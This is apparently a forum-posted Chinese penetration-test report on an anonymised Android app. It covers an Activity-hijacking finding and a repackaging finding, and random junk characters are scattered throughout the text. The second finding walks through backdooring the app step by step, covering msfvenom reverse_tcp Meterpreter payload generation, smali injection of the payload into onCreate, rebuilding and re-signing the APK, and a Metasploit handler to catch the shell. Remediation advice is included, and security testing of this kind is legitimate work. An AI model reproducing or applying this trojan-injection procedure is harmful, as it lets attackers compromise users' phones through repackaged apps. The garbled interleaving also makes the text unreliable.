' O. _; x4 l% |% K: ] 6 ?4 }7 ?4 I# i t* v

, y u8 G; ]; e$ v2 f r2 Y9 b E - W. P4 s- D0 A# X" ^( u 1-2 测试结果 ( o4 f8 t# n. _& l : I. Y7 v, R+ \6 } f

8 G% B( H# ?8 b, _ 5 ?% @* A6 T5 P

) \9 y* n' R4 ~- D6 q7 i* E " T; U1 B" \; y6 M7 k   2 I, f: H1 T) x! D) h! r$ Q; b" T6 o( L# G

) F/ N6 p0 z) X; R / S( T* _# C8 T( ]

& C2 G& g. l) l% T7 g2 t$ _. }! w* P, L 2 检测结果                    , z5 |: I9 v% p2 d - P8 |( J% t, O6 Z; ~

" u* T! x$ L* [3 Y' s% J : a# g9 p- ]2 k: D5 w

& _3 K/ d% C4 g, ^7 j# r' K+ m+ `8 b" G5 y7 U; y# b! y0 B 2.1 某某某 . m' ]# }5 e0 I / o. z- h5 o/ Z5 r% x5 B3 }

6 x8 L. S; v/ X( f/ @ ) {- K7 N7 m5 [" v1 A b+ M( C( a

, C9 f2 z5 T' U$ p5 B. N# x. F+ n+ P) _ g 2.1.1检测目标 H, C5 A! z/ j$ I' N 1 B0 s3 [/ d1 `- v9 p. p; _0 R

- e# R9 T; Y; R7 h- p8 v2 U $ c. [5 z x5 v6 i3 E/ X% R5 M* ~. T

, @) _. ?0 l; I' R% W, o5 ] " w5 p. c7 k {: W' m5 S; Z8 C6 s 目标地址: 某某某某某某APP 0 F- K" N9 ?& d+ y) S" b+ B 5 i7 g' _% `9 t g

7 C8 W6 b( [# Z+ W $ k& F. h! s, n$ K% o# P

8 H; I! w: z5 ?" `3 B M$ I ' s! K! F2 ^/ ~2 b- a 2.1.2检测结果 6 Z& e$ [/ K# m1 K- f 3 }+ K) P1 h5 w t4 i. w8 P N

: @6 Z6 ?. r- z6 H& y& ] - g; i7 B7 q: V5 f/ i% z

8 m. V/ _& x q- m3 [! @5 ^7 r 6 K; f. N7 i6 j9 b 2.1.2.1 # |+ v; b. j. {- k& S 8 J% z2 t) e- l! V/ d! ~7 u

% v4 u! t* C+ K7 S. R6 z! F& n- A& ]. X) X% k

' r) r3 l: s' {5 A1 K% w$ [: s& {! {7 G8 B& J 漏洞链接地址:某某某某某某APP ' i" H0 k4 Z& f( J) h& G: J _ K2 q& D- z+ F2 q7 G0 R$ [2 {

$ N e( Z& }# E( P5 v/ N! u: u$ m0 R" g! l6 r) l

9 n: A$ N: }3 a8 Q* T6 n& J7 e 0 \5 @8 ^4 M- S6 f! t/ ]7 B, Z   3 m$ R# f7 y* U" K8 f. L$ s * I7 m3 q* }, @& h; F

5 L. t1 t2 ^. i3 k" {9 ^2 M / m* S4 P. W% H9 L D

6 U4 V# ?5 C; g; c1 I5 L6 ]3 @! _% O " W$ L2 g7 h1 @, c4 Y# n 漏洞分析及取证: ! H1 b. U' q# B2 P& `0 m! W7 R8 Y ' i' Z$ ~" h5 x, A k! F8 _- A+ \2 Y

8 H* U- `' \$ N 9 N% z) w) ^$ [$ A5 G, U6 I4 T

% e$ Y' l. O2 T& z/ H+ r( I, h 5 p8 e, ~3 o$ Y                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ; @/ D! O- S- D3 t9 F. f - k! r, R1 o4 o* r

+ m! e; M" k$ ?3 o 7 q5 \2 u; K9 _' ]

( r- H2 \8 k/ ^# b, P; e7 L " |! z5 o$ ?3 h+ `      " w8 h7 k6 f2 Z6 w. V + i0 M" @3 ]7 Z3 Z, @ U0 w

+ N; F+ t8 N9 D O* m3 ~, ]3 P4 a* X7 N. B/ M% b/ P- r, e" S2 l

& V- H' y; v/ R5 `* ]' G" h 5 {* m* F9 B0 }( ~2 B                       , u7 w+ }) ], j/ s7 r $ w4 d' L: p5 I9 l. P8 z6 Q

1 N# L, v3 e7 H2 y6 w$ d4 y / n7 ]. w, p9 E( l' j8 G

+ m, V( h+ ?$ P3 r* S 7 F2 ^5 T" U: t" }# R _( F9 b" @) j, _: Z2 f+ f+ l3 {3 Y: Q, e : u1 i# S. _8 H( u, D/ I

2 B$ A: d% H# h/ f; s1 ^* W 5 o+ E/ p# y, G" ?% J' \2 s

/ D/ C5 e9 B. P- p/ m+ I8 y ) X. z8 C+ w+ o) U P5 p. Z 3 C) m$ [. M8 F, j) e7 f8 h6 `6 t8 Z! S; Q9 f( H4 W

1 f: a) P, u' b! p& V f. [' |0 o+ b

' S. _1 ]! a7 S- j, K . S+ r {' @" U$ e+ n5 b6 m ^8 E" \5 V 1 Q0 _6 V1 a6 c& w* U ' c( J$ A. e% O2 {( F

) W$ b4 }. z* O/ _5 H4 }/ ~ 6 D' L2 _& \2 e: [$ n1 \: c6 Z

; O% q% o( r. q* A( J5 k 9 Z* f& n% C. i3 Q( ` 漏洞危害:高 ( O5 Q) [! g, C7 [8 @# Y. @: l& k% ]$ D% i$ J; g9 d. N

' g7 L7 X J+ s. W) i6 J, T . E$ Z& z4 f7 g8 D. P
) ?( I" ]% W1 E; E3 H- E( { % J! p$ K1 r6 {" v3 B8 { K( J! }2 N# V- Z7 D1 j: {, f$ v2 H% n4 @, @6 c) ?% S: `8 \3 j- n: W8 o' g# X' q4 K, U% S: H0 I+ V3 v' \5 R- ^ V- \% w/ a! V( N5 Z* d6 W% Y" \: k4 h0 H% j. l7 T4 N" Q( d+ B' k1 _2 ]5 M- K2 V& u) K/ w' h4 K* N. N4 n- V2 z# E e% m! h& _/ t& T& G1 z/ f; ^' g/ X& o% u1 {& i/ S+ [3 z$ k n: ?6 {8 p7 d0 t1 f( _+ d9 B7 m, K& ~! M# S3 \" b* F1 Q1 I* V1 `9 ^) L2 O2 P' z; ~+ B8 T( \; Y8 w( q7 C% X& t$ e% I$ ?8 @* }) M3 h2 ]0 I& s" R$ {! _' l) N; @. ^, x! e) [ Y' B" V' M! x. h D1 l. u* F7 ^6 D7 q q. [5 }; W" A n3 [# D- L; v4 \1 s7 |+ B5 p3 g5 W h5 N; O. @5 V
9 ?9 I4 \2 _4 O! V, R0 ~9 k9 w$ O1 r2 q3 I

; ]2 D0 i7 F2 f, w ) |* h; J/ ~& V% S+ w. D) a 严重程度 2 {; s y. x! N ( v' w0 l! s& X6 `/ d$ X

7 [% Y+ Y- P ]' s & p/ n2 Q; V3 D3 [! G0 u 		7 K: G- ]( K* O4 d4 o% `9 D8 ^8 D& \/ L$ R u3 z- Y

0 V( k, A- a8 ?1 S8 o( F8 ]6 l' j: J, G; O) M+ d; M: Y 4 X. y; E' k2 Q+ r+ d: B$ ~ 3 o1 @! _; R( j# v3 q! D3 `

5 q3 ~& q/ X+ ^2 U [. s. u7 ~" ~4 `" O4 h4 ~ 		! Y9 K* E8 q# }2 t7 X# F( M ( Y/ I+ G' Y0 ^" S- f

4 L+ |& S' o% F( X, B0 ]0 ]7 G" U5 K ; `! S. k5 x7 s' T3 F4 ~& G . V" z7 m! `# D4 p3 | 7 E* j& _7 ]2 v) X1 H

: d( |; |/ g( o' [* f4 v& w5 F& G 0 N' P1 X* B3 T1 s 		- T1 a5 |+ V: I" ~; o8 s$ y , ?5 e" j1 Z( s* T

. C& O, E" b! z6 Y6 f' q & R$ j: h6 n3 e# R/ [ 2 ]3 Q8 u& O& i( q' z8 R: U4 }9 {) O; {6 w' w1 i8 ^) g

* r4 X0 }. T/ r9 D9 D5 W' b ; }/ O, V4 U, s' l7 {% j1 Q 		4 Q" O( C0 t# }2 ~ B3 _. @9 P , K7 {& t2 g# Y, U! L" n

+ n5 M1 {7 L5 \' S2 S 6 e0 F2 x- E0 Z0 ?( \   ( E8 J* ~" D6 p, ?2 [- b3 X+ y" ]9 j/ p$ G8 R# f$ L; `! e

* f8 }% k' D5 A$ r* l/ \ a4 M1 ] 		3 J K5 R# S" I% |; z W & i( k3 Z u4 b! z

, A" c% Z+ f% ]2 S' | w 7 ~9 M6 v- Y8 U# u$ M ! R$ K" }5 k: @( Z% ]$ c' } z, t; M3 H s* C3 K0 E' w6 D5 ?

7 {, P9 v1 i. f, i / w% K" h0 `3 U0 @ Y" ] F, H7 D 		! S, p6 E( \; Z6 b8 u9 o% M , B. T# t/ r- D) _3 W

% @. t- H& }. D$ M( C / p+ [. Y" ~( u# w+ {& _   0 Y" b: e; y0 w- o1 X % C7 c7 j- f, d9 o; V

, r: e- N( N1 Q- b& d) B# p ' z5 x) j9 m) v& V: k; K
?5 G2 j4 Z, c) b+ U2 K0 q4 P2 n1 i , H5 Z+ z/ D, R+ X
$ T6 ^6 `6 g( A% e+ `* e' q+ C0 q# \

2 M; Q2 ]% X! _# c6 |4 P( ^$ R) a$ B2 @) @8 W) `   . N) p) [) b5 z" K * [2 Z: P2 s. S4 s7 T

$ |1 c w: O& o) m 0 \+ H3 f6 G' a- |

: A, c# U+ l% _' z2 g+ K- N& W# N" G m3 G( Q0 V% U- ` 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ( l- G; u3 L, l+ S; B6 y0 m; p5 X2 m. {

! Q! l/ q( N! c5 g& n: r : A- v7 \: ~( K) P9 K

+ z) j2 L& G- M) X5 a0 u2 y8 g6 o7 i2 N8 @/ b% e           + d. n. G: e- N [( m 6 p4 ?: r. F/ _7 w7 v

" \' @$ |! Q! B & r% N4 Z8 }' Z4 W; p8 O

0 x) w4 F* ]& S! `$ o' q+ u$ N$ c : T) w5 z5 l8 j' {6 Q& }: l   $ Z& F4 O3 j7 m$ R) z+ C1 N- p! v2 d & G- D5 X8 U) k* j

E3 @6 A. g1 Q9 G ' Z/ Z. b, q$ ]% y+ b

4 g# b7 g& t- R# U/ [ $ \2 p, ]* Y% `* A% {% } 2.1.2.2 , ]1 i- A! m3 D$ x' y, t+ S8 Q8 F2 o7 N, c" Q

* l# b9 L( r, U) I3 w( i5 j# E$ P) K' W6 T: c/ f* C

) O8 P0 ~7 ]( D. D$ X# G$ W6 q. r- x6 [. Y/ Q j; S 漏洞链接地址:某某某某某某APP 0 }, v s, P# {$ ^ 4 I8 H* t! N R, z( P2 O

: {. S3 f: M* _: n9 ]+ w / h# d/ _' E) ?1 s

. b) i4 p, c( J/ f , Z3 ]9 v. ?. c 漏洞分析及取证: 7 f/ k7 C8 c- z2 e . S" S4 G4 D6 z1 G: z, S

0 Q# N) K. v8 A- D# L + b8 ~+ N9 Y* g, B- w

, x2 V* {( y0 i! f: M. R5 v 3 w* q5 V: Y+ b, F                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 }% s- U7 m% ~0 d2 }- u) Q3 a, R) M' S$ h+ U

" v7 N. B) n+ u ^/ e( B7 @, G $ P% ~- ^5 S5 n$ } z) s4 Y' s: _

0 o1 i! t6 [. M& t* b0 q8 P ! Z( Z/ M& `5 _& K+ d% d& } Metasploit 生成木马 apk ! W; f# a" A( P9 U( e8 G2 K3 p3 y0 E6 D* `' S& f' d

9 c2 }5 |7 K6 [0 U# c1 i 9 g5 i" j& K/ y' X

8 Z+ V$ o1 e: X& B1 L' ?5 [9 S# C3 b/ W4 u msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 8 \1 T7 m+ `) E" m " p9 t R. c) ~ f. N! C

[1 ~$ h4 [( L4 M / B, o6 U9 v/ O" k4 |

) D2 A2 \. C! n1 Q / O6 ~( _# y/ Z ~0 F 反编译目标apk和木马apk / Z7 G% q. M/ K $ f9 n" @ n! s7 K$ V. X

; _( O9 ]! Z3 `' R" X" v9 z, f6 g2 k7 | , }9 k: P6 ]- ~% `7 C% B

1 m, ~% W9 D! c1 G9 K! F3 W ! ?5 P1 w" C! K6 P! p apktool d target.apk
! _3 O! s; F* ~ ' j$ g: [3 p9 _$ T apktool d cockhorse.apk 3 `0 N! C, |$ j1 C8 C5 t, y7 ~ . D8 _ [0 V! k! d

6 k; M" s% v0 Y# _ + w4 W$ K0 K* M: v* K! f

Q" S3 Y$ v0 k5 A# C V- [8 [ 4 l# O- ~, [5 K( E 木马 apk 注入目标 apk 7 u' y( u! [, }& p& u$ m7 } 2 d# m* A4 u# s6 d

9 A; j d. Z t( S5 w 8 J9 S+ o/ D; {* b2 Z' Z8 T. k

9 h: X9 w2 r0 y0 P: Y" V$ v8 x 9 Q6 c2 e O" [* Y/ p 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 M& w6 |2 n X! e3 v& }) m0 p H/ }% h4 y& n1 J2 O. F2 | invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # B6 z1 }0 ~2 p5 J- A9 ]% y ; T s8 k. P" S& F H( j

" r2 {5 [; r* Y7 u5 a6 n % ?% S% S% m v+ F% z! J. G

" K/ n/ t( E) H6 _8 L, U( v8 Z ) J/ K$ Z8 l9 g2 }+ l; }2 Z 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 v- `5 k- m; E+ q7 f3 ? h- T7 z8 U1 w" p) I: P% P3 P

9 `* l5 o; z5 Z( x6 _& k $ F3 V* b% S9 O( i4 \

) H3 D) e) v5 a* ] 8 `/ t5 s1 z7 | 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ I: W1 H* h( ` ) k" }9 t& n5 R! Z& V( V1 G6 U

0 Z1 t" T: r% M, a! Q9 u 7 u) U1 \! R+ s; U. [$ r% k

; X+ A4 I" y" M* Y# F* ] % d5 S& d, l9 b# ]& T; ?. k 回编译生成最终 apk 5 u& K: h' D$ y5 C: ~- Y. @6 b+ H* J; T) `( j

; ^- M- A- K6 J+ F! r * R; o$ a' x/ g. s% F$ W' |

n2 J0 y2 V) K( _1 K" n- P B; W5 J* h3 Y/ w6 v. n 重新打包 k+ Y2 P9 D1 O7 ~8 E& r. \7 H2 S8 b) J( [/ ~/ L- S- D

9 b% C+ n, ^- i- v - Y- }- L! _7 g2 |( A! j

3 O4 Y0 ` R1 z6 h 3 ?8 a6 P- ^: E+ B5 u! e apktool b -o repackage.apk target_app_floder " x% c) s. P5 h+ K0 P' ` 9 E o, {" {5 {0 { U! ~

1 @3 d' o$ Y- s0 F& r5 ^1 u " F$ d( g& O7 T' q* u

5 o n! u% ]; g) c9 B/ q$ o ' }# D6 o' T& Z* R 创建签名文件,有的话可忽略此步骤 ! U# g; w" i, ~9 i o7 z6 h( S/ k5 o0 Q

& I5 O! T) \4 q! ~6 y1 `& B4 P% d" C 1 g% y; o& P3 A; Y5 m0 c' O( A

; Y5 ?( U- q& n+ M& S ( C& U3 z$ L9 F. S% ^; g6 X) X keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                / W+ L4 N) v# P2 r; K& `0 z , J* | N) ^9 P% [0 c# Y1 J

2 l: I2 x O8 b3 z" T g* F- q5 G/ a8 ~9 B9 j- ] m" b6 ?

1 [$ U; }; h) D3 V8 W8 K: L6 v; P " a2 y2 [- e- d8 a/ R/ U 签名,以下任选其一 4 ?5 q& t8 T. ~& O! f+ u % D6 L6 ^+ V0 V0 }% c! k

9 f# x4 \7 I2 y! w [# ?1 R 1 k L0 ?& F1 X

0 q' J' D3 z' e$ j- h " w$ E8 c3 T2 g+ g3 I jarsigner 方式 & v R. R3 i# S) U! p# Z $ t! h$ }( k& g. O( n

* m6 H& t& J; Y, [3 w& G : G$ u" ~; q$ \

8 w" K C: V1 T$ L/ j0 D6 J; G' b( O8 d% T9 H jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 @- s A2 J- X9 z3 ?6 u 8 U1 i/ T! Y- K

. ~$ X2 k& V5 [% ~. j * X, B; N# T. G3 p+ u" Z, W

) t% O4 c4 U* s* F3 q6 E* Z, N1 E3 I 6 _$ d: P$ M% n9 [. r apksigner 方式 - h V. Z' k1 m# _" Q + K# n( `+ F8 j& q, u2 _

- [6 V" I* p" I0 d. G/ ?. l, v& l 7 U2 k0 |/ ?0 k+ K8 N- |

% b9 {) m* o: G' C2 r/ Z* n ! x$ g0 H+ h4 B+ ^ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 Y0 N$ `/ s! N6 z" r ! c4 O4 I7 F# M8 G. t

% l: w- N. x9 I, C/ m: j: v, w7 w 2 [4 z# i8 }1 ]

e0 y. c0 l% n0 N0 {2 k$ {6 P: ` 如需要禁用 v2签名 添加选项--v2-signing-enabled false * e6 X& o! r. E1 W 3 E: H, N8 j# i9 c

9 J# r! b2 b y$ ], | b: {* {* K# y6 i& W+ c) c' \* @

7 Z8 Q3 E+ m9 P, n3 K6 Q ( u/ K- w$ w, T 验证,以下任选其一 + x1 z/ R! m |0 f- S 1 r- z: v5 f: @6 P' E( v8 f

' p% k' y0 }4 _( ]( w" d! \, u d4 w. Q* W$ S6 _

: C/ a( C L; D! o4 r5 M" N9 E' W, Q; G jarsigner方式 8 W$ Q1 q& l2 |+ n$ E- j O; W; L$ j! \7 M8 l

' n. H4 T" _4 p% \6 Z5 Z- M; g* H7 @5 q$ W$ U2 z

: p6 ~$ h" k- I3 A' `2 j+ J5 z- i! l # _% V' g% B) `# R& \1 v* t jarsigner -verify repackaged.apk 2 t4 q" ~* ^4 h F' Q9 L( p + b0 v( s' g0 O$ Z& `7 N, G/ J+ w0 U

/ {, `" ^/ D! W' R( j# {' F4 g, U- ?8 C5 c4 j c+ \0 d d

! O9 Z" e: ?( }; S6 U9 N. x; T1 O9 t% l! g+ t9 L. L' j apksigner 方式 5 m+ o/ b7 m' n7 y, Z6 a# Y- _, [2 \- t4 _" O- f

. }8 n: y5 r; y0 u8 i" a4 q i* j$ W! c/ R

7 I8 K) D( {" p8 i( \. H' f4 L2 D 0 L/ c5 `: ?3 _/ R- x8 J: |! s apksigner verify -v --print-certs repackaged.apk . q" `( n2 K( }" z$ z/ S* V0 S- Q' Z$ V+ d* n/ G4 i

1 `1 w, f3 a9 f; n& R7 b1 e+ Q7 ]4 t6 f# o

; F- V; |# l) v6 A+ Q9 M0 V% i: [# c) R2 I keytool方式 2 i0 o7 A; p* V$ v) A' I+ B . \# s0 f9 e2 I1 [8 F7 M

8 N3 W4 G( Z4 \& h' Q- \! G 1 v+ w6 Q4 b3 k

" J, }& D U& O' i . W9 A7 f0 [9 r, h keytool -printcert -jarfile repackaged.apk 1 M& A/ i3 ^$ d# V% W+ U) @# |/ r% }; c# e * _) O1 B; L! i

0 w7 U w5 x$ k( G' A7 K8 l: g8 } 4 _6 i2 e: A$ u

. `' l8 I1 P. U9 `6 x4 a6 H , n j: e1 w. ~9 T' p 对齐 / V, ~( l9 D9 L7 y8 a9 r 7 I% D0 r% S: t9 H4 b! q- V" n

; @% z/ z. R C& B# @3 j 6 P3 U: O$ K3 V

. G- v \2 {7 k$ Q) u , L9 c% h% A' L/ E" a5 `9 a( h 字节对齐优化 , I5 W; E" s; p4 U+ x 9 u; r2 ~0 n/ D3 q, O

$ u$ {7 a; g, Q( a+ D! [) @( t+ x) g) Y1 w5 `0 s$ l$ g0 B! ?

' U! U! J3 W9 H) H3 H! l6 S5 H6 X3 Z6 Q e; o! y2 n9 f0 N; U; E6 B zipalign -v 4 repackaged.apk final.apk 8 K% ?! B" ^( |: l , I, a/ N9 L* q6 _# W8 ^

. E! p) S* Q0 W+ I% X2 B * B! G v9 C" O0 X

7 l$ t# u. J2 Q; {8 L. m, @5 ~' H d- H1 K 检查是否对齐 : g) r/ V2 Q8 \! D6 }4 C) x7 O; f9 ~0 X m% f; i5 {

2 i; Q/ x% E- M0 V; z- @ . ^9 b, B# {& \

; B4 B: l) Z/ x! A5 G8 a# P4 t5 }( e+ N+ h" w6 d zipalign -c -v 4 final.apk / f- n. o6 z* v) P/ y5 ] # g5 |* U# ^7 h0 e: i- o2 c+ }

( p" N! w4 g/ B: v: u4 F( b$ I- H& u! V& a" U3 J3 P+ O

% P7 c/ |6 a0 z7 ?0 ^# p0 M0 N ' X9 R. q9 H' m 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 ~; b4 U% c* n) C- V+ t$ I7 s7 k & B; y! p; \* D8 Q7 u

- { s6 @# p5 y6 y. E6 v+ u7 c , ?+ @! V) A) B

4 U! J* n+ h- j4 w% l- z5 w+ \; @ 2 ~" K4 L* t+ y9 q! K% B 启动Metasploit控制台,配置参数等待上线 : q0 ?: e% v: E( `) o9 N K# j t+ P) m& w. s2 r/ w2 ?

6 U$ g( w6 M! X W " L" s# q9 |9 g" D& a

3 A2 a' F% @( D7 [% g" ? h 3 \$ F2 q$ p; v3 H 在终端依次输入如下命令 , D" S) Z6 ~! w. y2 _$ y . y( C% |. v9 s6 o( R

$ Y$ L2 R. D& u1 F/ A+ J0 C Q, b, Y* P" z2 E! ?# V% x9 G

* b& ]- Y! S1 o* `' K 3 D: d ^8 u. n& a3 T. M4 N msfconsole 9 o; \ p( b( u4 Q' A+ ^: ]1 F+ _$ c* M% {+ Y

* w) a9 M7 Z' u5 l+ H 0 b% L/ j6 r. H; M% v

# E# H$ o0 m* n( g' t: ?6 `9 @ & n9 w9 t9 i# y/ q use exploit/multi/handler / u7 T3 H9 K& o1 F " E$ }( l }/ D8 ~- v7 @ Z& r& \

1 F7 V' t! X2 A. r, b9 {( {) _. O. f! b' Q0 r- F2 _

8 W$ E3 M% x5 a( I+ J& }# c) n& n2 x8 L! e: Y2 [ set PAYLOAD android/meterpreter/reverse_tcp G9 X5 X$ r: I- D; O3 B6 y4 Q7 y, Z

' A o r" ~' M0 ^. D% `' y* u 7 y& r. c* R# c

2 G: U' r- _, V M3 Y7 r ! J& }0 T: V! ~: h; B6 |: w set LHOST 192.xxx.xx.xx : H; V7 N6 i1 _% F/ j6 y9 U6 y6 M 9 I8 o; G+ C4 _, U7 [- c6 N

& h7 k& l& ~% r$ ^6 Z1 N # G0 Y7 D; ~4 j, [/ }1 |

; L8 y8 L( x7 N" N& b9 K0 Z( t . x2 K2 Z( V6 \5 d/ G: K set LPORT 4444 2 ^6 M7 H1 D; X9 N8 q- K) W6 E1 \6 D9 y0 S+ B

* f0 [/ n* Q/ L' y* r; N1 q7 G' g$ l N2 ^3 x% @

" |; ^& ^1 q0 a/ p 9 C! h9 F4 [ h6 a exploit : s; n! \+ K& E* L" a9 y' _( R8 b& } c3 d9 T( H, k9 L7 M! |$ c: j4 |

+ u- a" \4 b9 u; M6 h; f' t : ~; ^4 S& _ `# V- m7 j! I

& ]" ]7 ?, m" _, F1 d , f. J& T% C( A A7 P 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ! n* d" e( h+ a' ]9 Y, i4 I$ z , U1 q9 r1 n6 k: r; y( t" r

~3 y- \( V) k | & J5 Y' J. F$ k8 K# N1 W' p M- R

, z# I0 Z! ~/ K: L3 h& W; J " l* ]0 m7 l% `' c' z) K: x 漏洞危害:中 7 Q# b$ z1 \1 `" ~" ] 9 v& M, d6 a! m* W

0 P6 C: \/ E; [, }" ^ 4 ~& A4 \6 G/ O* Y2 M
( z0 ~9 ?( D( U/ G1 P& @# w. V r5 \% @ , }$ i: s0 F- ~, f( L" V / T. c' K3 y$ [, D1 g. ] - T7 a* e, y) C: i6 h) w" h/ ^- T. m/ T( F, F% F- F( y. P$ n! a. l) A- s* D7 K) j4 b* e$ I% w# A+ ^ a' |/ O- g9 z$ q, }6 ]5 q$ L% }. M. D. Z! O5 f: }" T) h& o, c. j2 F8 T) K! v+ n, m* u+ b4 b5 i; h7 v! _) h4 j) `2 I, d! n, u; P& P5 M$ K) D+ {( S9 o' E6 v( X8 H0 p x" V% M$ [ s) c" M6 [, q! S" f4 x+ C9 g1 N N+ C* Q7 |# N' z. P2 I+ {9 o6 f& x5 H$ A% S: g7 L7 H9 }6 w- J' l2 r1 L, W% z& I8 C; B! Z! |6 O0 o* x3 _ e7 J& p; d7 b$ x' ]+ R3 d' h C4 d+ O. J7 |7 I0 j8 U; {7 z/ w6 \! q, `- i1 u# W+ n- w( b: O5 J, M; ^# h' i2 z; g
8 s m2 k7 |0 Y - h* A5 m- m5 J1 _2 \; ]& ^! o

: }, Y' a! ]- ` d, U3 e3 \: Y ! r4 X+ t7 c& ` z+ \ 严重程度 " W( Z: B$ J3 H- A; X- | ) ]3 g" b. Q* i9 O _

1 b; X, Z& A% i& A / A9 V$ @) x, R: S3 }4 ` 		) B; e7 d4 I' X ) f5 N, x# ^. e. f

6 ?! b, `/ W, k- Y0 c 3 S9 p; a9 t. [: T& N0 o. z 6 O, N' i5 Y' L1 n" z. R; O6 G! j9 U) i0 s% C6 n

+ [0 M: L% _0 P2 e+ D: p3 v0 Y+ Q 1 b3 {" S. u+ c 		8 @, b! t8 I/ B; W8 p 0 j& \2 o5 {' T- ?1 p9 L

/ Z( s5 j: a- a7 I: c4 L: M& L3 T+ G5 i& Z+ L U; H/ A3 U # q* F% I; H# P5 {% K) L' ` " `9 e' i5 W. ?/ ?. [

# D/ q+ k9 t! y" a- Q& `6 d5 E 7 n! x1 O" V! ?4 L+ ]6 U2 H5 \ 		' ~- P7 d( `2 ~9 V( Z( F 4 G- l* Z/ y A$ v0 W

6 @0 ~/ w6 W# p0 Q5 a8 K ?2 l$ t/ |+ F# X H ) `9 E# J; h5 y: i8 v5 G $ J( i% h$ E K% v& D

! d0 o) l5 r! a8 c* `5 J; r # j, K& N- B1 t+ j 		5 {1 G$ `1 R. G$ ^) l! o / G5 z4 f7 t& N5 t \) {# {) \% t & J" p8 b; O/ r/ H1 X) B4 A/ M- K8 q* m0 [+ w

! J! y9 p0 a9 Z# v + K) E. ~; J/ a" Q   2 G/ u9 @8 m6 h- u 5 w0 k% C4 [6 H

% L* |& z/ `* t5 X+ }5 C2 x $ p( A( w7 K# o, t+ Q( R. L 		5 B) K; c( q, o6 }: J% F6 }4 [. j2 }3 V5 G# X$ z

6 Q" H' _; V+ [* A. e8 s / b& Q, _/ {3 c. |: _# \ / d! f3 Q, H# _2 l$ H. \. | ( T( d" n3 H% u9 G, f

3 }0 }( _* D4 U - y( x4 k$ C" r* k' m 		* G3 |! F5 B' ?2 N # U. o0 ?# u- [4 ^3 r h # h# q8 ]( q* m" X, }& H# | ( Y/ |. H+ s+ Z5 D, k, Y4 W( `

3 ?+ W1 P0 l; W9 k ! L2 K" \4 L+ {   % P: l) S+ i* Q" B % L: d/ D. q6 ~# I

7 V2 J$ C& ]6 L u6 t. b9 f * w3 g! G; b" Z1 \' b ]0 k
. l% z/ \) C: v, X* J/ V% c/ ^% l/ ?, A
' t2 u2 ]9 D9 e9 v 3 Y+ d6 E: I/ u

2 a+ x, X v& o( D6 b( L! Y& u ; R' e% S6 R m# z   / b, ]+ ^4 L$ y7 D$ ~" K, ^' Q ' I+ N: f5 a" @5 R/ \4 [+ ?1 @

2 [8 s7 C: D: q$ w' i/ T5 q* W) u6 m% M) u# d4 |2 `

, x: Y# g) {8 ?0 k) N/ G# a: F/ W5 U& s3 B 修复方法: 1 }3 m! L) [' W$ s % w- F0 i6 g/ A- d! l5 C

) `! R- u: m+ G8 d % p" ~% t; `1 b5 B

1 e! f, o$ f# a* l+ U2 E8 L( j g. t" k5 h" h3 C( i               1. APP 启动时应做签名校验防止二次打包。
& Z1 ~; w0 m+ _8 c& J6 g! P 1 v6 t4 @* i: v7 g! q$ f 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 " a! C- o6 U! x# H6 m9 Q $ X$ [9 c0 [3 E/ y. ]% J) p3 b

9 r9 B) M* ^. H4 Y ) F/ i' C! {$ w/ G( k9 c- E- G " i. r( h# L4 f+ L6 @ ; O6 W& |7 U. \' a9 [# H

" m3 H7 |3 Y1 g/ A. t0 _( a& P. d; W6 b8 f2 w6 Q; s   : }9 l' c5 @* I7 L- _- A 6 W s) ]" ~3 Y, f4 G

9 F6 e9 v/ P- |' ?6 t: ~9 y 8 ^# T* ~4 j: y: | 8 \7 U- u6 `$ `, D & U9 |: K' O8 F+ g4 F

* ?) @' {7 Y9 s# f . O$ g1 }$ F0 B& M3 B1 V
0 T: K4 X7 s" A6 l* ?- B " p# y! J8 Y3 }0 f8 Z% g" J

7 T7 @& \6 G( z% D/ d3 b% j8 Q% j: k- Z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表